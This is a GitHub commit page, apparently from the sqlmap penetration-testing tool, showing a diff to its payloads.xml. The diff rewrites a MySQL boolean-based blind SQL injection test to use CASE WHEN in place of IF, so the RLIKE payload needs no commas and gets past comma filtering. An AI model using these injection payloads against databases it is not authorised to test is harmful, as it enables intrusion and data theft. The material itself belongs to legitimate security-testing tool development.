Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 6305c1e

Browse files
committed
Making a comma-less RLIKE payload
1 parent dbaa35f commit 6305c1e

1 file changed

Lines changed: 4 additions & 4 deletions

File tree

xml/payloads.xml

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -719,16 +719,16 @@ Formats:
719719
<test>
720720
<title>MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)</title>
721721
<stype>1</stype>
722-
<level>3</level>
722+
<level>5</level>
723723
<risk>1</risk>
724724
<clause>1,2,3</clause>
725725
<where>1</where>
726-
<vector>RLIKE IF([INFERENCE],[ORIGVALUE],0x28)</vector>
726+
<vector>RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))</vector>
727727
<request>
728-
<payload>RLIKE IF([RANDNUM]=[RANDNUM],[ORIGVALUE],0x28)</payload>
728+
<payload>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END))</payload>
729729
</request>
730730
<response>
731-
<comparison>RLIKE IF([RANDNUM]=[RANDNUM1],[ORIGVALUE],0x28)</comparison>
731+
<comparison>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))</comparison>
732732
</response>
733733
<details>
734734
<dbms>MySQL</dbms>

0 commit comments

Comments
 (0)